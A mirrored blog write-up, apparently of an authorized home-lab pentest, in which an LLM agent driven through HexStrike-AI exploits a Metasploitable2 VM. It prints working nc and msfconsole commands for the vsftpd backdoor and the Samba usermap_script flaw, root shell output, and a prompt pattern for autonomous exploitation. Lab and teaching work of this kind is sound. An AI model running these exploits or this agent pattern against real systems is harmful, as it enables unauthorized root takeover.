HexStrike+OpenAI Codex. AI-Driven Exploitation of Metasploitable.
- Category: AI-Assisted Pentest
- Source article: https://medium.com/@1200km/hexstrike-openai-codex-ai-driven-exploitation-of-metasploitable-b892c07be39f
- Published: 2026-01-03
- Repository: https://github.com/anpa1200/Hexstrike-AI-guide
- Preserved media: 8 article image(s), including screenshots and infographics where present.
- Preserved technical blocks: 8 code/configuration block(s).
Ecosystem Fit
This page mirrors the original Medium lab content into the 1200km knowledge base so it remains available inside the 1200km.com documentation ecosystem. Use the linked repository when one exists; otherwise use the deployment commands and configuration blocks preserved below as the lab source of truth.
Deployment Requirements
The full prerequisites, deployment flow, validation commands, screenshots, and operational notes are preserved from the article below. Review the repository metadata above first, then follow the article sections in order.
How I Used an LLM-Orchestrated Toolchain to Enumerate and Exploit a Deliberately Vulnerable Host (With Real Proofs)

Introduction
AI-assisted penetration testing is no longer a concept — it is operational reality.
In this article, I walk through areal, authorizedpenetration test against my own lab host runningMetasploitable2. I used an LLM-driven workflow (Codex CLI) orchestrating tool execution throughHexStrike-AIto perform:
-
network discovery
-
enumeration and service fingerprinting
-
exploit selection and execution
-
proof collection (root-level command output)
This was not a simulation.
Real tools were executed. Real vulnerabilities were validated. And the target was compromised withunauthenticated root access— twice — via two independent attack paths.
Core Guides and Setup
HexStrike on Kali Linux 2025.4: A Comprehensive Guide
- Focus: Initial setup and overview of the AI-powered offensive security framework.
HexStrike-AI: A Force Multiplier for Red Teams — and a Dangerous Shift in the Threat Landscape
- Focus: Analysis of AI-orchestrated pentesting and its implications.
HexStrike MCP Orchestration with Ollama: Ubuntu Host, Kali VM, SSH Bridging, and Performance…
- Focus: Technical architecture using Model Context Protocol (MCP) and local LLMs.
Practical Applications & Lab Comparisons
HexStrike + Gemini vs. HackerAI: “Ops Copilot” vs. “Chatbot with Tools”
- Focus: Practical lab comparison of orchestration quality between different AI security tools.
AI-Driven Pentesting at Home: Using HexStrike-AI for Full Network Discovery and Exploitation
- Focus: Step-by-step home lab application for network enumeration.
Specific Tooling & Technique Guides
-
AI-Driven Wireless Penetration Testing. One Prompt WIFI cracking(Using HexStrike-AI)
-
AI-Driven Office Documents Password Recovery with HexStrike-AI and Gemini-CLI
-
AI-Driven PDF Password Recovery with HexStrike-AI and Gemini-CLI
-
AI-Driven ZIP Password Recovery with HexStrike-AI and Gemini-CLI
What Is HexStrike-AI?
HexStrike-AI is not “another scanner.”
It is an orchestration layer that lets an LLM:
-
decide what security tools to run
-
execute them locally (or via SSH/MCP)
-
interpret outputs
-
adapt strategy dynamically (timeouts, missing tools, privilege constraints)
-
optionally run controlled exploitation with PoC evidence
In short:
The AI plans. HexStrike executes. Kali delivers the tools.
Test Scope & Authorization
This assessment was conducted under explicit authorization.
Scope
-
Target:
172.16.163.129 -
**Environment:**private home lab (Metasploitable2 VM)
-
**Attacker:**Kali Linux environment with Codex CLI + HexStrike MCP

The Prompt That Started Everything
This is the “pattern” that makes LLM-driven pentesting actually work: you must demandexecution + evidence.
Example prompt structure (adapt it to your CLI):
Use the MCP server
"hexstrike"
: Authorized pentest of
172.16
.163
.129
Full service discovery
Enumerate versions
Identify
vulnerabilities
(by severity)
Exploit critical findings
Provide
proofs
(command output)
Key lesson: If you want HexStrike to run tools, explicitly require tool execution and proof artifacts.

Phase 1: Reachability and Discovery
The first attempt targeted a wrong IP (172.16.59.129) and resulted in “host seems down.”
After correcting to:
172.16.163.129
The host responded immediately.
A fast top-ports discovery scan confirmed the target was up and exposed a broad attack surface.
Phase 2: Enumeration & Service Fingerprinting
Because the environment had constraints (root privileges not always available, tool timeouts), the workflow adapted:
-
switched from SYN scan (
-sS) to TCP connect (-sT) -
used bounded host timeouts
-
reduced version intensity when needed
Confirmed exposed services (high-level)
The target exposed multiple legacy services typical of Metasploitable2:
-
FTP (21)
-
SSH (22)
-
Telnet (23)
-
SMTP (25)
-
DNS (53)
-
HTTP (80)
-
RPCbind (111)
-
SMB (139/445)
-
rlogin/rsh (513/514)
-
NFS (2049)
-
FTP alt (2121)
-
MySQL (3306)
-
PostgreSQL (5432)
-
VNC (5900)
-
X11 (6000)
-
AJP (8009)

Host identity confirmation
The HTTP landing page provided a definitive marker:
curl -s http://172.16.163.129:80 |
head
-n 5
Output included:
<title>Metasploitable2 - Linux</title>
At this point, the test shifted from “general assessment” to “known vulnerable image validation” — meaning we should expect multiple published RCE paths.
Phase 3: Vulnerability Discovery (What Stood Out Immediately)
Two services were immediate critical flags due toknown RCE historyin this lab image:
-
vsftpd 2.3.4(commonly backdoored in lab builds)
-
Samba 3.0.20(classic usermap_script RCE path)
Rather than listing every CVE possible for every old service, the workflow focused on:
-
vulnerabilities withdirect, reliable exploitability
-
minimal risk of destabilizing the host
-
clear PoC output validation

Phase 4: Exploitation (With Proofs)

Exploit #1 — vsftpd 2.3.4 backdoor (CVE-2011–2523) → Root
Why it worked
In the Metasploitable2 build, vsftpd is intentionally vulnerable. A crafted username containing:)triggers a backdoor listener (commonly on TCP/6200).
Step A — Trigger the backdoor
(printf
"USER test:)
\r
\n
PASS test
\r
\n
QUIT
\r
\n
"
; sleep
1
)
|
nc
-
nv
-
w
2
172.16
.
163.129
21
This confirmed:
-
FTP reachable
-
banner:
220 (vsFTPd 2.3.4)
Step B — Connect to backdoor shell and capture proof
printf
"id
\n
uname -a
\n
whoami
\n
pwd
\n
"
|
nc
-
nv
-
w
3
172.16
.
163.129
6200
Proof (captured output):
uid
=
0
(
root
)
gid
=
0
(
root
)
Linux metasploitable
2.6
.
24
-
16
-server
#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/
**Impact:**Unauthenticated Remote Code Execution →root.
No persistence was deployed. No further actions were taken.
Exploit #2 — Samba usermap_script (CVE-2007–2447) → Root bind shell
Why it worked
Samba 3.0.20 has a well-known remote command execution vulnerability via the username map script feature. Metasploit automates exploitation.
Tooling nuance: why a bind shell was used
The first Metasploit run produced unstable command shell behavior (sessions closing quickly and command execution differences between session types). The workflow pivoted to abind shell payload, which is often more reliable in constrained environments.
Step A — Launch exploit with bind netcat payload (binds on port 4446)
msfconsole -q -x
'use exploit/multi/samba/usermap_script; \
set
RHOSTS
172.16
.
163.129
;
set
RPORT
139
; \
set
payload cmd/unix/bind_netcat; \
set
LPORT
4446
;
set
DisablePayloadHandler
true
; \
exploit -z;
exit
-y
'
Step B — Connect to bind shell and capture proof
printf
"id
\n
uname -a
\n
whoami
\n
pwd
\n
"
|
nc
-
nv
-
w
3
172.16
.
163.129
4446
Proof (captured output):
uid
=
0
(
root
)
gid
=
0
(
root
)
Linux metasploitable
2.6
.
24
-
16
-server
#1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
root
/
**Impact:**Unauthenticated Remote Code Execution →root.

Final Results Summary
What was validated
-
Broad service exposure consistent with Metasploitable2
-
Two separate unauthenticated root compromises, each independently sufficient for full takeover:
-
vsftpd backdoor (TCP/6200)
-
Samba usermap_script (bind shell on TCP/4446)

What was intentionally not done
-
No persistence / backdoors
-
No credential harvesting
-
No data collection beyond proof commands
-
No lateral movement testing
This kept the test strictly PoC-focused.
Remediation Recommendations (Real-World Perspective)
Metasploitable2 is intentionally insecure. In real systems, the remediation playbook is clear.
Critical
-
Remove backdoored/vulnerable services immediately
-
Never expose training VMs on networks shared with real assets
-
Enforce segmentation (lab VLAN / host-only networks)
High
-
Remove legacy cleartext and trust-based services:
-
Telnet
-
rsh/rlogin
-
VNC / X11 (unless strictly controlled)
-
Restrict SMB exposure and enforce modern versions/configs
Medium
-
Disable obsolete crypto (SSLv2) and weak ciphers
-
Remove version banners and harden HTTP stack
-
Restrict AJP to localhost/internal networks only
Low
-
Reduce attack surface: firewall by default, allowlist by source
-
Continuous inventory and exposure monitoring
Why This Matters
This test highlights the real value of AI in offensive workflows:
AI did not “replace” pentesting skills. Itamplifiedthem.
The LLM-driven workflow:
-
selected practical next steps
-
adapted to missing tools and privilege constraints
-
pivoted when sessions were unstable
-
still produced clean PoC artifacts
The operator still matters — but themental overhead drops sharply.
Final Thoughts
HexStrike-AI is not a toy. Used correctly, it behaves like a junior pentester with perfect memory and infinite patience — executing exactly what you instruct and iterating until it gets results.